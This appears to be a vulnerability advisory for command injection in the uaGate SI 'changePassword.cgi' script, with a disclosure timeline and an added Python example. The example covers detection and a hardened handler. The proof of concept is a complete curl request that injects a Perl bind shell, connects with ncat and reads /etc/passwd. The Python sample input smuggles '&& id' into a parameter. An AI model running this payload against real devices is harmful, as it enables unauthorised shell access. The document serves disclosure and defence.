A CGI script of the uaGate SI handles its parameters in an unsafe fashion. Maliciously crafted URL parameters can transfer an arbitrary command payload that is executed with the rights of the web server. The command output written to stdout is returned by the web server in the response to the malicious web request.
An authenticated attacker can execute arbitrary commands by issuing a web request.
proof of concept details
curl http://uagate/cgi-bin/changePassword.cgi -d "newPassword=*******&confirmPassword=*******&user=mfadmin&oldPassword=*******+%26%26+perl+-e+%27use+Socket%3B%24p%3D4223%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bbind%28S%2Csockaddr_in%28%24p%2C+INADDR_ANY%29%29%3Blisten%28S%2CSOMAXCONN%29%3Bfor%28%3B%24p%3Daccept%28C%2CS%29%3Bclose+C%29%7Bopen%28STDIN%2C%22%3E%26C%22%29%3Bopen%28STDOUT%2C%22%3E%26C%22%29%3Bopen%28STDERR%2C%22%3E%26C%22%29%3Bexec%28%22%2Fbin%2Fbash+-i%22%29%3B%7D%3B%27" --user mfadmin:****** & (sleep 1; ncat uagate 4223) cat /etc/passwd
This exploit can be used in an exploit chain together with a privilege escalation vulnerability to gain complete control over the target device.
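The root cause described above is a CGI handler that lets a request parameter reach a shell as part of a command string. The following is an added example, not code from the advisory or from the uaGate SI firmware: it decodes a form body the way a CGI script sees it, flags parameters that carry shell metacharacters (a log or WAF check a defender can run over request bodies), and contrasts a hypothetical unsafe command-string construction with a hardened handler that validates the fields and passes them as an argv list with no shell. The command name "passwd-tool", the form field names reused from the request shown above, and the sample bodies are assumptions and constructed input.

```python
"""Added example (not part of the advisory or the vendor's firmware).

Assumptions: the vulnerable CGI handler built a shell command string from the
form parameters (reconstructed here only as a string, never executed); the
hardened handler passes them as an argv list without a shell. "passwd-tool"
is a hypothetical stand-in for the real password-change utility.
"""
import re
import subprocess
from urllib.parse import parse_qs

# Shell metacharacters that turn a parameter into a second command or a
# command substitution. Used for detection over request bodies.
SHELL_META = re.compile(r"(&&|\|\||[;|`<>]|\$\(|\$\{|\n)")


def decode_form_body(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into a dict of
    single values (first value wins), as a CGI script would see it."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def find_injection_candidates(body: str) -> dict:
    """Return {param: decoded_value} for every parameter carrying shell
    metacharacters. A detection aid for web logs, not a substitute for the fix."""
    return {k: v for k, v in decode_form_body(body).items() if SHELL_META.search(v)}


def vulnerable_build_command(params: dict) -> str:
    """Hypothetical reconstruction of the unsafe pattern: parameters are
    interpolated into one string destined for /bin/sh. Returned, never run."""
    return "passwd-tool {user} {oldPassword} {newPassword}".format(**params)


def hardened_change_password(params: dict) -> list:
    """Hardened form: validate each field, then build an argv list.
    The caller runs it with run_without_shell(); no shell parses the values."""
    user = params.get("user", "")
    if not re.fullmatch(r"[a-z_][a-z0-9_-]{0,31}", user):
        raise ValueError("invalid user name")
    for key in ("oldPassword", "newPassword", "confirmPassword"):
        value = params.get(key, "")
        # Reject empty values and anything outside printable ASCII.
        if not value or any(not 0x20 <= ord(c) <= 0x7E for c in value):
            raise ValueError(f"{key} is empty or contains non-printable characters")
    if params["newPassword"] != params["confirmPassword"]:
        raise ValueError("password confirmation mismatch")
    return ["passwd-tool", user, params["oldPassword"], params["newPassword"]]


def run_without_shell(argv: list) -> str:
    """Execute argv directly (shell=False is the default): every element is one
    literal argument, so metacharacters inside a value are never interpreted."""
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


# Constructed sample bodies: a benign password change and one whose
# oldPassword field chains a second command with an encoded "&&".
BENIGN_BODY = "newPassword=s3cret&confirmPassword=s3cret&user=mfadmin&oldPassword=old"
CHAINED_BODY = "newPassword=a&confirmPassword=a&user=mfadmin&oldPassword=old+%26%26+id"

if __name__ == "__main__":
    print("flagged:", find_injection_candidates(CHAINED_BODY))
    params = decode_form_body(CHAINED_BODY)
    print("unsafe string:", vulnerable_build_command(params))
    print("safe argv:    ", hardened_change_password(params))
    # With argv passing, the injected text stays a literal argument:
    print(run_without_shell(["echo", params["oldPassword"]]).strip())
```

Note that the hardened handler does not try to strip metacharacters from passwords; a password may legitimately contain `&` or `;`. The fix is that no shell ever sees the value, and the detection regex is only there to spot attempts in request logs.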
- day 0 - re-test of uaGate SI Device - 07.08.2019
- day 7 - CVE ID issued by MITRE - 14.08.2019
- day 47 - issue report to manufacturer - 23.09.2019
- day 61 - manufacturer acknowledged security issues - 07.10.2019
- day 63 - fix found in Firmware 1.72.00.1996 - 09.10.2019
- day 64 - released - 10.10.2019